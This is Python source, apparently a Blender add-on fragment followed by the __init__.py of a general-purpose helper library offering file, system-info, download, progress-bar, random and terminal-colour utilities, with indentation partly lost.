tcom = threadCom(eval_path_computing, eval_path_state, eval_path, process_type, process, location, name)
readthread = threading.Thread(target=threadread, args=([tcom]), daemon=True)
readthread.start()
bg_processes.append([readthread, tcom])
if not bpy.app.timers.is_registered(bg_update):
bpy.app.timers.register(bg_update, persistent=True)
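# Hedged usage sketch (the command line and property paths below are illustrative,
# not taken from this file); the spawned process is expected to print lines like
# "progress{...}" to stdout so threadread() can pick them up:
#
#     import subprocess
#     proc = subprocess.Popen(['blender', '-b', 'scene.blend', '-P', 'upload.py'],
#                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#     add_bg_process(eval_path_computing='bpy.context.scene.myprops.uploading',
#                    eval_path_state='bpy.context.scene.myprops.upload_state',
#                    eval_path='bpy.context.active_object',
#                    process_type='UPLOAD', process=proc)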
def stert_bg_blender():
    pass
def register():
bpy.utils.register_class(KillBgProcess)
def unregister():
bpy.utils.unregister_class(KillBgProcess)
|
__init__.py
|
'''
This module is one to make your code shorter.
Its high-level API will make you feel you are ordering and the machine is doing!
There is also a collection of the most useful functions and methods from popular Python modules.
(Read the help of each function.)
Official documentation will be added soon.
'''
'''
Written By RX
Last Update: 1-15-2021
'''
__version__ = '3.0.0'
"""
< Release Changes >
- style.log_ now have all time prefix by default
- call=call_later
- system.mac_address
- io.selective_input choices can be dict
- Class Internet
- class date_time
"""
'''
TODO:
- average()
DATETIME:
X calendar_month_st replace day will be all noms
- Passed Time func
- System.(copy_to_clipboard & paste_from_clipboard)
- Other archive files in extract
- Call_later **kwargs
- Internet:
default_timeout
- files:
- files.join files.dirname
- Error in files.MEMBERS.all_all_*
- socket.socket()
- Screen recorder
- Make Sound
- mp3 tags (v 3.x)
    - registry editor (v 3.x)
- re module (v 3.x)
- Developer:
reload_module
Check_Type
add_module_dir
- Create Local Server
- ( win32api.LoadLibrary() - ctypes.PyDLL() )
X Threading
- Ready-obj module
- !style defaults
- Check 3rd-party modules imports
- pip install update
- Open Video
- Open Audio
'''
#START
import os as _os
import re as _re
import sys as _sys
import abc as _abc
import time as _time
import socket as _socket
import typing as _typing
import urllib as _urllib
import shutil as _shutil
import random as _random
import datetime as _datetime
import calendar as _calendar
import requests as _requests
import subprocess as _subprocess
from bs4 import BeautifulSoup
from typing import (Any,Iterable,Optional,Callable,List,Union)
import psutil as _psutil
argv = _sys.argv
ABC = _abc.ABC
ABCMeta = _abc.ABCMeta
####### 8888888888 888 d8b #######
#### 888 888 Y8P ####
#### 888 888 ####
#### 8888888 888 888 88888b. .d8888b 888888 888 .d88b. 88888b. .d8888b ####
#### 888 888 888 888 "88b d88P" 888 888 d88""88b 888 "88b 88K ####
#### 888 888 888 888 888 888 888 888 888 888 888 888 "Y8888b. ####
#### 888 Y88b 888 888 888 Y88b. Y88b. 888 Y88..88P 888 888 X88 ####
####### 888 "Y88888 888 888 "Y8888P "Y888 888 "Y88P" 888 888 88888P' #######
def p(text='', end='\n'):
'''
p is print!
But because we use it a lot, we\'ve decided to make it one letter.
Example:
p('Hello World')
==>Hello World
'''
print(text, end=end)
def repeat(function, n: int, **kwargs):
'''
Repeat function for n times with given parameters
for more info see the example below.
Example:
        repeat(rx.screenshot, 3, image_name='screenshot.png')
==> "function rx.screenshot will be executed 3 times."
'''
for _ in range(n):
function(**kwargs)
def wait(seconds):
'''
    Use this if you want your program to wait for a certain time.
Parameters
----------
seconds : [int/float]
time to sleep program in seconds
'''
_time.sleep(seconds)
sleep = wait
def cls():
'''
You can use this function if you want to clear the environment.
'''
import platform
if platform.system() == "Windows":
_os.system('cls')
else:
_os.system('clear')
clear = cls
def progressbar(
total=100, dashes_nom=100, delay=1, dashes_shape=' ', complete_shape='█',
pre_text='Loading: ', left_port='|', right_port='|'):
'''
    Use this function to make a custom in-app progress bar (not very useful on its own).
    (Use the Progressbar() generator instead if you need to do your own work while the bar updates.)
    Example:
        progressbar(
            total=100, dashes_nom=10, delay=1, dashes_shape='-',
            complete_shape='#', pre_text='Loading')
==> Loading|####------| 40/100
'''
def Progressbar(it, prefix="", size=60, file=_sys.stdout):
count = len(it)
def show(j):
x = int(size*j/count)
file.write(f"{prefix}{right_port}{complete_shape*x}{dashes_shape*(size-x)}{left_port} {j}/{count}\r")
file.flush()
show(0)
for i, item in enumerate(it):
yield item
show(i+1)
file.write("\n")
file.flush()
for _ in Progressbar(range(total), pre_text, dashes_nom):
wait(delay)
def wait_for(button:str):
"""
If You Want to Wait For the User to Press a Key (Keyboard/Mouse)
Use This Function.
Parameters
----------
button : str
Button to click
Raises
------
ValueError
It will be raised when invalid button is given
"""
button = button.lower()
if button.lower() in ('middle', 'left', 'right', 'back', 'forward'):
if button == 'back':
button = 'x'
if button == 'forward':
button = 'x2'
import mouse
mouse.wait(button)
else:
import keyboard
try:
keyboard.wait(button)
except:
raise ValueError('Incorrect Button Name.')
def call_later(function:Callable, *args, delay=0.001):
"""
Call Your Function Later Even Between Other Operations
(This function uses threading module so be careful about
how, when, and on what object you are going to operate on)
Parameters
----------
function : Callable
this should be your function name
delay : float,int
delay before calling function in seconds, by default 0.001
"""
import threading
thread = threading.Thread(target=lambda: (sleep(delay), function(*args)))
thread.start()
#keyboard.call_later(function, args, delay)
call = call_later
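# Hedged usage sketch: schedule a call roughly two seconds from now while the main
# flow keeps running (the callable and arguments are only examples):
#
#     call_later(print, 'two seconds passed', delay=2)
#     print('printed immediately')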
def convert_bytes(num:int) -> str:
"""
Convert num to idiomatic byte unit.
Parameters
----------
num : int
number you want to convert (in Byte)
Returns
-------
str
number + unit
Examples
--------
>>> convert_bytes(200)
'200.0 bytes'
>>> convert_bytes(6000)
'5.9 KB'
>>> convert_bytes(80000)
'78.1 KB'
"""
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return "%3.1f %s" % (num, x)
num /= 1024.0
def restart_app(python3:bool = False):
"""
    This function closes the app and restarts it.
    (It uses os.execv to re-execute the current interpreter with the same argv.)
Parameters
----------
python3 : bool, optional
use 'python' or 'python3', by default False
"""
_os.execv(_sys.executable, ['python3' if python3 else 'python'] + _sys.argv)
_sys.exit()
def active_window_title() -> str:
"""
    Get the active window's title.
    (Usually the terminal is the active window,
    but if you switch windows while your script is running,
    this returns the newly active window's title.)
Returns
-------
str
string of active window title
"""
import pyautogui
return pyautogui.getActiveWindowTitle()
def open_image(path:str) -> None:
"""
Open image file with default image viewer.
(Mac OS is not supported yet)
Parameters
----------
path : str
path to the image file
Raises
------
OSError
It will be raised when you run this function in not supported OS
"""
import platform
if platform.system() == 'Windows':
_os.system(path)
elif platform.system() == 'Linux':
_subprocess.getoutput(f'xdg-open {path}')
else:
raise OSError('Only Windows and Linux are supported for this function.')
_BASENAME=''
def download(url:str, filename:str=_BASENAME, save_memory:bool=True,
progressbar:bool =True, prefix:str='Downloading'):
'''
Use this function to download files.
if filename is not given, it will be last part of the url.
filename can be path for saving file.
save_memory parameter is used to save memory in large files
(save directly to storage)
'''
import requests, urllib
if not filename:
filename = url.split('/')[-1]
if save_memory:
'''
with _urllib.request.urlopen(url) as response, open(filename, 'wb') as f:
_shutil.copyfileobj(response, f)
'''
'''
r = _requests.get(url, stream = True)
with open(filename,"wb") as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
'''
if progressbar:
with open(filename, "wb") as f:
response = _requests.get(url, stream=True)
total_length = response.headers.get('content-length')
if total_length is None:
f.write(response.content)
else:
dl = 0
done = 0
total_length = int(total_length)
for data in response.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
done = int(33 * dl / total_length)
_sys.stdout.write(f"\r{prefix} {filename}: |{'█' * done}{' ' * (33-done)}| {100-((33-done)*3)}%")
_sys.stdout.flush()
if 100-((33-done)*3) == 96:
_sys.stdout.write(f"\r{prefix} {filename}: |{'█' * done}{' ' * (33-done)}| 100%")
_sys.stdout.flush()
else:
with open(filename, "wb") as f:
response = _requests.get(url, stream=True)
for data in response.iter_content(chunk_size=4096):
f.write(data)
else:
def report(blocknr, blocksize, size):
if progressbar:
current = blocknr*blocksize
_sys.stdout.write("\rDownloading {1}: {0:.2f}%".format(100.0*current/size,filename))
def downloadFile(url):
_urllib.request.urlretrieve(url, filename, report)
downloadFile(url)
pass
if progressbar: print()
def extract(filename:str, path:Optional[str]=None,files:Optional[Iterable[str]]=None,
password:Optional[str]=None) -> None:
"""
Extract Files from Zip files
By default it extracts all files
Parameters
----------
filename : str
path to .zip file
path : str, optional
path to extract files (by default: folder in current working directory)
files : Iterable[str], optional
Iterable of files you want to extract, by default None
password : str, optional
password if your .zip file is password protected, by default None
"""
import zipfile
zipfile.ZipFile(filename, 'r').extractall(path=path,members= files,pwd=password)
def screenshot(image_name:str='Screenshot.png'):
'''
This function will take a screenshot and save it as image_name
'''
import pyscreeze
return pyscreeze.screenshot(image_name)
def func_info(func:Callable):
"""
print some information about 'func'
Parameters
----------
func : Callable
function you want to get its information
"""
help(func) #func.__doc__
print('-'*30)
print('Module ', func.__module__)
print('-'*30)
try:
_code_ = str(func.__code__)
_code_ = _code_[_code_.index(',')+2:-1]
except AttributeError:
_code_ = f'No "file" and "line" information available '
_code_ += f' (I guess "{func}" is a built-in function)'
print(_code_)
def Progressbar(
total=60, dashes_nom=30, dashes_shape=' ', complete_shape='█',
pre_text='Loading: ', left_port='|', right_port='|'):
'''
Make your code more beautiful with progressbars!
    This is a generator function, so use it like this:
    >>> for _ in Progressbar(100, 10):
do_this()
do_that()
Loading: |████ | 40/100
'''
echo = _sys.stdout
def show(j):
x = int(dashes_nom*j/total)
echo.write(
f"{pre_text}{right_port}{complete_shape*x}{dashes_shape*(dashes_nom-x)}{left_port} {j}/{total}\r")
echo.flush()
show(0)
for i, item in enumerate(range(total)):
yield item
show(i+1)
echo.write("\n")
echo.flush()
_MOUSE_X = 0
_MOUSE_Y = 0
def pixel_color(x=_MOUSE_X, y=_MOUSE_Y) -> tuple:
"""
Function to return color of pixel of screen in tuple of RGB
Parameters
----------
x : int
pixel of column x, by default last x of mouse
y : int
pixel of row y, by default last y of mouse
Returns
-------
tuple
tuple with 3 integers: (RED,GREEN,BLUE)
"""
import pyautogui
if not x:
x = pyautogui.position()[0]
if not y:
y = pyautogui.position()[1]
PIXEL = pyautogui.screenshot(region=(x, y, 1, 1))
COLOR = PIXEL.getcolors()
return COLOR[0][1]
def import_module(path:str):
"""
Import modules from files even if they are not .py
Parameters
----------
path : str
path to file to import it
Returns
-------
ModuleType
return module
"""
import importlib.machinery
import importlib.util
loader = importlib.machinery.SourceFileLoader('MOD', path)
spec = importlib.util.spec_from_loader(loader.name, loader)
mod = importlib.util.module_from_spec(spec)
loader.exec_module(mod)
return mod
######################
# TUPLE FUNC #
######################
def force(tpl: Any, *var: Any) -> tuple:
'''
(TUPLE FUNCTION)
It returns tpl with adding var(s) to it.
'''
return tuple(list(tpl)+[v for v in var])
#force= lambda tpl,*var: tuple(list(tpl)+[v for v in var])
def erase(tpl: tuple, *var: Any) -> tuple:
'''
(TUPLE FUNCTION)
It returns tpl with removing var(s) from it.
'''
#lstv= [v for v in var if v in tpl]
lstt= list(tpl)
for th in [v for v in var if v in tpl]:
lstt.remove(th)
return tuple(lstt)
def replace(tpl: tuple, ind, var: Any) -> tuple:
'''
(TUPLE FUNCTION)
Replace tpl[ind] with var
'''
tpl=list(tpl)
if type(ind) == str:
ind= tpl.index(ind)
tpl[ind]=var
return tuple(tpl)
def insert(tpl: tuple, ind, var: Any) -> tuple:
'''
(TUPLE FUNCTION)
Exactly like tpl[ind]=var in lists but for tuples.
'''
tpl=list(tpl)
if type(ind) == str:
ind= tpl.index(ind)
tpl.insert(ind,var)
return tuple(tpl)
def pop(tpl: tuple, index=-1) -> tuple:
    '''
    (TUPLE FUNCTION)
    Like list.pop but for tuples: returns tpl without the item at index.
    '''
    lst = list(tpl)
    lst.pop(index)
    return tuple(lst)
"""
def screen_recorder():
from screen_recorder_sdk import screen_recorder
#screen_recorder.enable_dev_log ()
screen_recorder.disable_log()
pid = 2456
screen_recorder.init_resources(pid)
screen_recorder.start_video_recording ('video1.mp4', 30, 8000000, True)
_time.sleep(10)
print('hello')
for i in range(100):
x= i**3
screen_recorder.stop_video_recording ()
screen_recorder.free_resources()
class Error(Exception):
'''
This module is for creating you own Error and Exception!
Useage:
>>> MyError = Error(name='MyError', msg='An Error occurred')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
MyError: An Error occurred
Also You can raise it directly:
>>> raise Error(name='MyError', msg='An Error occurred')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
MyError: An Error occurred
'''
def __new__(cls, msg, name=''):
Error.__name__ = name
return super(Error, cls).__new__(cls, msg)
def __init__(self, **kwargs):
pass
"""
####### .d8888b. 888 888 #######
#### d88P Y88b 888 888 ####
#### 888 888 888 888 ####
#### 888 888 888 8888b. .d8888b .d8888b .d88b. .d8888b ####
#### 888 888 888 "88b 88K 88K d8P Y8b 88K ####
#### 888 888 888 888 .d888888 "Y8888b. "Y8888b. 88888888 "Y8888b. ####
#### Y88b d88P 888 888 888 888 X88 X88 Y8b. X88 ####
####### "Y8888P" 888 888 "Y888888 88888P' 88888P' "Y8888 88888P' #######
class Random:
'''
random Variable Generator Class.
(ALL FUNCTIONS ARE STATIC METHODS)
'''
@staticmethod
def choose(iterator,k: int =1,duplicate=True):
'''
Return a random element from a non-empty sequence.
'''
if type(k) != int:
raise TypeError('k must be integer.')
if k == 1:
return _random.choice(iterator)
elif k > 1:
if duplicate:
return _random.choices(iterator,k=k)
else:
return _random.sample(iterator,k=k)
else:
            raise ValueError('k must be higher than 0')
@staticmethod
def integer(first_number,last_number):
'''
Return random integer in range [a, b], including both end points.
'''
return _random.randint(first_number,last_number)
@staticmethod
def O1(decimal_number=17):
'''
return x in the interval [0, 1)
'''
return round(_random.random(),decimal_number)
@staticmethod
def number(first_number,last_number):
'''
return x in the interval [F, L]
'''
return _random.uniform(first_number,last_number)
@staticmethod
def shuffle(iterable):
'''
Return shuffled version of iterable
'''
real_type = type(iterable)
new_iterable = list(iterable)
_random.shuffle(new_iterable)
if real_type in (set,tuple):
return real_type(new_iterable)
elif real_type == str:
return ''.join(new_iterable)
elif real_type == dict:
return {item:iterable[item] for item in new_iterable}
else:
return new_iterable
random = Random
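# Hedged usage sketch for the Random helpers (all values are illustrative):
#
#     random.choose(['red', 'green', 'blue'])           # one random element
#     random.choose(range(10), k=3, duplicate=False)    # three distinct samples
#     random.integer(1, 6)                              # like rolling a die
#     random.shuffle('abcdef')                          # returns a shuffled str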
class Files:
'''
(STATIC METHODS)\n
Actions and information about files.\n
(READ FUNCTIONS DOCSTRING)
GET INFORMATION:
- exists()
- size()
- abspath()
- mdftime()
- acstime()
- content (read function)()
- is file()
- is dir()
- is readonly()
- is hidden()
ACTIONS:
- remove()
- rename()
- move()
- copy()
- hide()
- read only()
- write()
'''
@staticmethod
def size(path):
'''
return size of the file in byte(s).
Also work on directories.
'''
return _os.path.getsize(path)
    # TODO: test this on directories as well
@staticmethod
def remove(path,force=False):
'''
Use this to delete a file or a directory.
If force is True it will delete non-empty directories.
'''
if _os.path.isfile(path):
_os.remove(path)
else:
if force:
_shutil.rmtree(path)
else:
try:
_os.rmdir(path)
except OSError:
raise OSError(f"[WinError 145] The directory is not empty: '{path}'" + '\n' + ' '*23 +
'(Use force=True as an argument of remove function to remove non-empty directories.)') from None
delete = remove
@staticmethod
def rename(old_name,new_name):
'''Rename files with this function.'''
_os.rename(old_name,new_name)
@staticmethod
def abspath(path):
'''
return absolute path of given path.
'''
return _os.path.abspath(path)
@staticmethod
def exists(path):
'''
Search for the file And Returns a boolean.
if file exists: True
else: False
'''
return _os.path.exists(path)
@staticmethod
def mdftime(path):
'''
Get last modify time of the path.
'''
return _os.path.getmtime(path)
@staticmethod
def acstime(path):
'''
Get last access time of the path.
'''
return _os.path.getatime(path)
    # TODO: conversion to a date object should be added
@staticmethod
def move(src,dst):
'''
        Move (cut) file/directory from src to dst.
'''
_shutil.move(src,dst)
#live_path= dst
    # TODO: does this also work for folders?
@staticmethod
def copy(src,dest,preserve_metadata= True):
'''
Copy the file from src to destination.
preserve_metadata is for preserving metadata of file when copying.
(You can use it instead of rename too.
e.g:
copy('D:\\Test.py','E:\\Ali.py')
(It copies Test.py to E drive and renames it to Ali.py)
)
'''
if files.isdir(src):
_shutil.copytree(src,dest)
else:
if preserve_metadata: _shutil.copy2(src,dest)
else: _shutil.copy(src,dest)
@staticmethod
def hide(path,mode=True):
'''
Hide file or folder.
If mode==False: makes 'not hide'
(ONLY WINDOWS)
'''
try:
import win32api, win32con
except:
raise ImportError('Please install pywin32 via pip')
if mode:
win32api.SetFileAttributes(path,win32con.FILE_ATTRIBUTE_HIDDEN)
else:
win32api.SetFileAttributes(path,win32con.FILE_ATTRIBUTE_NORMAL)
@staticmethod
def read_only(path,mode=True):
'''
Make file attribute read_only.
If mode==False: makes 'not read_only'
'''
if type(mode)==bool:
from stat import S_IREAD,S_IWUSR
if mode==True:
_os.chmod(path, S_IREAD)
elif mode==False:
_os.chmod(path, S_IWUSR)
else:
            raise Exception('Second argument (mode) should be boolean.')
@staticmethod
def read(path):
'''
This can help you to read your file faster.
Example:
read('C:\\users\\Jack\\test.txt')
==> "Content of 'test.txt' will be shown."
'''
with open(path) as f:
FileR= f.read()
return FileR
@staticmethod
def write(file_path,text=None,mode='replace',start=''):
'''
        With this method you can change the content of the file.
        file_path: file whose content you want to change.
        text: content you want to write to the file.
mode: Type of writing method.
'a' or 'continue' for add content to end of the file.
'w' or 'replace' for overwriting to file content.
start: I use this when I use mode='continue'
'''
if mode=='replace':
op= open(file_path,mode='w')
if text==None:
text= input('Type what you want.\n\n')
op.write(text)
op.close()
elif mode=='continue':
'''opr= open(file,mode='r')
FileR= opr.read()
op= open(file,mode='w')'''
op=open(file_path,'a')
if text==None:
text= input('Type what you want to add in the end of the file.\n\n')
op.write(start+text)
op.close()
else:
raise ValueError('mode can only be: replace(default) or continue Not "{0}"'.format(mode))
@staticmethod
def isdir(path):
return _os.path.isdir(path)
@staticmethod
def isfile(path):
return _os.path.isfile(path)
@staticmethod
def is_readonly(path):
'''
Return True if path is readonly else False.
(May Not Work in Linux)
'''
        return _subprocess.getoutput(f'dir /ar {path} >nul 2>nul && echo True || echo False') == 'True'
@staticmethod
def is_hidden(path):
"""
Check whether a file is presumed hidden, either because
the pathname starts with dot or because the platform
indicates such.
Return True if File or Directory is hidden.
(Work on both Linux and Windows)
"""
import platform
full_path = _os.path.abspath(path)
name = _os.path.basename(full_path)
def no(path): return False
        platform_hidden = getattr(Files, 'is_hidden_' + platform.system(), no)
return name.startswith('.') or platform_hidden(full_path)
@staticmethod
def is_hidden_Windows(path):
import ctypes
res = ctypes.windll.kernel32.GetFileAttributesW(path)
assert res != -1
return bool(res & 2)
@staticmethod
def search_file(pattern, path='.\\',return_mode: Union['list','Generator']= 'list'):
'''
Search for files in path.
Return list or generator.
pattern:
- 'x.py' : search for 'x.py' in path.
- '*.py' : search for all files with .py extension in path.
- '*.*' : search for all files in path
- '**/*' : search for any file in path and also all sub-directories.
- '**/*.py: search for all python files in path and also sub-directories.
- 'mydir/**/*.py' : search for all python files in path/mydir/ and all of its sub-directories.
'''
import glob
if str(return_mode).lower() in ('list','generator'):
#print(_os.path.join(path,pattern))
if return_mode=='list': return glob.glob(_os.path.join(path,pattern), recursive=True)
else: return glob.iglob(_os.path.join(path,pattern), recursive=True)
else:
if type(return_mode)==str:
raise ValueError(f"return_mode van be 'list' or 'generator' not {return_mode}")
else:
raise TypeError(f"return_mode type should be 'str' and it should be in ['list', 'generator']")
@staticmethod
def search_content(path,word):
ALL= [val for sublist in [[_os.path.join(i[0], j) for j in i[2]] for i in _os.walk(path)] for val in sublist]
'''lst=[]
for file in ALL:
if word in rx.read(file):
lst.append(file)
return lst'''
return [file for file in ALL if word in open(file).read()]
@staticmethod
def mkdir(path):
path = _os.path.normpath(path)
NEW= ''
for FILE in path.split('\\'):
NEW+= FILE+'\\'
try: _os.mkdir(NEW)
except (FileExistsError,FileNotFoundError): pass
@staticmethod
def generate_tree(dir_path, level: int=-1, limit_to_directories: bool=False,
length_limit: int=1000, print_info: bool=True):
"""Given a directory Path object return a visual tree structure"""
from pathlib import Path
from itertools import islice
space= ' '; branch = '│ '; tee= '├── '; last= '└── '
dir_path = Path(dir_path) # accept string coerceable to Path
files = 0
directories = 0
def inner(dir_path: Path, prefix: str='', level=-1):
nonlocal files, directories
if not level: return # 0, stop iterating
if limit_to_directories: contents = [d for d in dir_path.iterdir() if d.is_dir()]
else: contents = list(dir_path.iterdir())
pointers = [tee] * (len(contents) - 1) + [last]
for pointer, path in zip(pointers, contents):
if path.is_dir():
yield prefix + pointer + path.name
directories += 1
extension = branch if pointer == tee else space
yield from inner(path, prefix=prefix+extension, level=level-1)
elif not limit_to_directories:
yield prefix + pointer + path.name
files += 1
RETURN=''
RETURN+=dir_path.name+'\n'
iterator = inner(dir_path, level=level)
for line in islice(iterator, length_limit): RETURN+=line+'\n'
if next(iterator, None): RETURN+=f'... length_limit, {length_limit}, reached, counted:'
if print_info: RETURN+=f'\n{directories} directories' + (f', {files} files' if files else '')
return RETURN
class MEMBERS:
@staticmethod
def all_exactdir(dir):
return _os.listdir(dir)
@staticmethod
def all_all_sep(dir):
return [i for i in _os.walk(dir)]
@staticmethod
def files_exactdir(dir,abspath=True):
if abspath:
return [dir+'/'+file_ for file_ in [i for i in _os.walk(dir)][0][2]]
return [i for i in _os.walk(dir)][0][2]
@staticmethod
def files_all(dir):
return [val for sublist in [[_os.path.join(i[0], j) for j in i[2]] for i in _os.walk(dir)] for val in sublist]
@staticmethod
def files_all_sep(dir):
return [[_os.path.join(i[0], j) for j in i[2]] for i in _os.walk(dir)]
@staticmethod
def dirs_exactdir(dir, abspath=True):
if dir.endswith('/'): dir=dir[:-1]
elif dir.endswith('\\'): dir=dir[:-1]
if abspath:
return [dir+'/'+folder for folder in [i for i in _os.walk(dir)][0][1]]
return [i for i in _os.walk(dir)][0][1]
@staticmethod
def dirs_all(dir):
return [TPL[0] for TPL in [i for i in _os.walk(dir)]]
files = Files
write = files.write
read = files.read
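# Hedged usage sketch for the Files helpers (the paths below are made up):
#
#     write('notes.txt', 'hello', mode='replace')
#     read('notes.txt')                       # -> 'hello'
#     files.copy('notes.txt', 'backup.txt')
#     files.search_file('*.py', path='.')     # list of .py files in the cwd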
class System:
'''
Some system actions and information.
- Information about ram, ip, terminal, etc.
- Some System Actions like Shutdown and Restart
(ALL FUNCTIONS ARE STATIC METHODS)
'''
@staticmethod
def accname():
'''
return account username you have logged in.
'''
return _os.getlogin()
@staticmethod
def pid():
'''
Get pid number of terminal and return it.
'''
return _os.getpid()
'''@staticmethod
def disk_usage(path):
####
return _shutil.disk_usage(path)'''
@staticmethod
def chdir(path):
'''
Change directory of terminal.
'''
_os.chdir(path)
@staticmethod
def SHUT_DOWN():
'''
Shut down the PC. (WINDOWS)
'''
_os.system("shutdown /s /t 1")
@staticmethod
def RESTART():
'''
Restart the PC. (WINDOWS)
'''
_os.system("shutdown /r /t 1")
@staticmethod
def terminal_size() -> tuple:
'''
Return terminal size in tuple (columns,rows)
'''
size= _os.get_terminal_size()
return (size.columns,size.lines)
@staticmethod
def cwd():
'''
Return a unicode string representing the current working directory.
'''
return _os.getcwd()
@staticmethod
def ip_global():
"""
        Return the global ip using the http://ipinfo.io/ip api.
        Returns the global ip as a string.
"""
try:
import requests
new_session = _requests.session()
response = new_session.get("http://ipinfo.io/ip")
import re
ip_list = _re.findall(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", response.text)
new_session.close()
return ip_list[0]
except:
raise ConnectionError('No Internet Connection') from None
"""ip_global= internet.ip_global"""
@staticmethod
def ip_local():
"""
Return local ip of computer in windows by _socket. module
and in unix with hostname command in shell.
"""
#return [l for l in ([ip for ip in _socket.gethostbyname_ex(_socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [_socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
'''
s = _socket._socket.(_socket.AF_INET, _socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
'''
import platform
class NetworkError(Exception):
def __init__(self, message): super().__init__(message)
try:
ip = _socket.gethostbyname(_socket.gethostname())
if ip and ip != "127.0.1.1":
return ip
elif platform.system() != "Windows":
import subprocess
command = _subprocess.Popen(["hostname", "-I"],stdout=_subprocess.PIPE,stderr=_subprocess.PIPE,stdin=_subprocess.PIPE,shell=False)
response = list(command.communicate())
if len(response[0]) > 0:
return str(response[0])[2:-4]
raise NetworkError('No Network Connection')
raise NetworkError('No Network Connection')
except:
raise
"""ip_local= internet.ip_local"""
@staticmethod
def ram_total(convert=True):
"""
Return total ram of board as string
parameter convert: flag for convert mode (using of convert_byte function)
"""
response = list(_psutil.virtual_memory())
if convert:
return convert_bytes(int(response[0]))
return str(response[0])
@staticmethod
def ram_used(convert=True):
"""
Return how much ram is using.
parameter convert: flag for convert mode (convert with convert_byte function)
"""
response = list(_psutil.virtual_memory())
if convert:
return convert_bytes(int(response[3]))
return str(response[3])
@staticmethod
def ram_free(convert=True):
"""
Return how much ram is available.
parameter convert: flag for convert mode (convert with convert_byte function)
"""
response = list(_psutil.virtual_memory())
if convert:
return convert_bytes(int(response[1]))
return str(response[1])
@staticmethod
def ram_percent(ONLY_NOM=False):
"""
        Return used ram percentage as a number if ONLY_NOM, as a string with % if not ONLY_NOM.
Parameter ONLY_NOM: flag for return type and value.
"""
response = list(_psutil.virtual_memory())
if ONLY_NOM:
return response[2]
return str(response[2]) + " %"
@staticmethod
def boot_time():
'''
Return the system boot time expressed in seconds since the epoch.
'''
return _psutil.boot_time()
@staticmethod
def device_name():
return _socket.gethostname()
@staticmethod
def ip_website(url):
'''get IP address of Web Site'''
return _socket.gethostbyname(url)
"""ip_webs= internet.ip_website"""
@staticmethod
def win10_notification(title,message,icon=None, duration=5) -> None:
'''
(THIS ONLY WORKS FOR "WINDOWS 10")\n
        Display a notification with title, message and icon for a specific duration.
'''
try:
from win10toast import ToastNotifier
ToastNotifier().show_toast(title,message,duration=duration)
except:
raise ImportError('Use "pip install win10toast" to install required module')
@staticmethod
def cpu_count(logical=True):
'''
Return the number of logical CPUs in the system
(same as _os.cpu_count() in Python 3.4).
If *logical* is False return the number of physical cores only
(e.g. hyper thread CPUs are excluded).
Return None if undetermined.
'''
return _psutil.cpu_count(logical)
@staticmethod
def pyshell_execute_bit():
'''to determine whether a Python shell is executing in 32bit or 64bit'''
#return platform.architecture()[0][:2] # SLOW
#return ctypes.sizeof(ctypes.c_voidp)*8
import struct
return struct.calcsize("P") * 8
@staticmethod
def pids() -> list:
'''Return a list of current running PIDs'''
return _psutil.pids()
@staticmethod
def cpu_percent() -> float:
'''
Return a float representing the current system-wide CPU utilization as a percentage.'''
return _psutil.cpu_percent()
@staticmethod
def pid_exists(pid) -> bool:
return _psutil.pid_exists(pid)
@staticmethod
def mac_address(formatted=False):
import uuid
mac = uuid.getnode()
if formatted:
return ':'.join(['{:02x}'.format((mac >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])
return hex(mac)
system = System
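# Hedged usage sketch for the System helpers (returned values are examples only):
#
#     system.accname()                    # logged-in user name
#     system.ram_free()                   # e.g. '5.2 GB'
#     system.cpu_count(logical=False)     # physical core count
#     system.mac_address(formatted=True)  # e.g. 'aa:bb:cc:dd:ee:ff'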
from colored import fg as _fg
from colored import bg as _bg
from colored import attr as _attr
class Style:
'''
This class is for Changing text Color,BG & Style.
(Using colored module but easier)
- style.print to customize your print.
- style.switch to change terminal colors.
- style.switch_default for making everything default.
Also You Can Create style object.
This will allow you to:
- Because it returns string You can Add it to other strings
- Slicing and indexing (Without Color)
'''
def __init__(self, text, color='default', BG='black'):
try:
self.color = color.lower()
self.BG = BG.lower()
#style = style.lower()
except:
pass
if color == 'default':
self.color = 7 #188
self.text = text
        self.content = f"{_fg(self.color)}{_bg(self.BG)}{text}{_attr(0)}"
def __str__(self):
return self.content
def __repr__(self):
return self.content
def __add__(self, other):
#print(type(other))
if type(other)!=style:
return self.content+other
else:
return self.content+other.content
@staticmethod
def print(text='', color='default', BG='default', style=None, end='\n'):
'''
text(text='Hello World',color='red',BG='white')
output ==> 'Hello World' (With red color and white BG)
Styles: bold - underline - reverse - hidden
*bold and underline may not work. (Depends on terminal and OS)
'''
try:
color = color.lower()
BG = BG.lower()
style = style.lower() if style and type(style)==str else 0
except:
raise
if style == 'none':
style = 0
if color=='default' and BG!='default': # _bg & !clr
print(f'{_attr(style)}{_bg(BG)}{text}{_attr(0)}', end=end)
elif color!='default' and BG=='default': # !_bg & clr
print(f'{_attr(style)}{_fg(color)}{text}{_attr(0)}', end=end)
elif color=='default' and BG=='default': # !_bg & !clr
print(f'{_attr(style)}{text}{_attr(0)}', end=end)
elif color!='default' and BG!='default': # _bg & clr
print(f'{_attr(style)}{_bg(BG)}{_fg(color)}{text}{_attr(0)}', end=end)
@staticmethod
def switch(color='default', BG='black', style='None'):
'''
Change color,BG and style untill you call it again and change them.
'''
try:
color = color.lower()
BG = BG.lower()
style = style.lower()
except:
pass
if style == 'none':
style = 0
if color == 'default':
color = 7
print(f'{_attr(style)}{_bg(BG)}{_fg(color)}', end='')
@staticmethod
def switch_default():
'''Switch Terminal Attributes to its defaults'''
print(f'{_attr(0)}', end='')
reset = switch_default
@staticmethod
def log_success(text, color='green', BG='default', style=None, add_time=True):
#globals()['style'].print(text, color, BG, style=style)
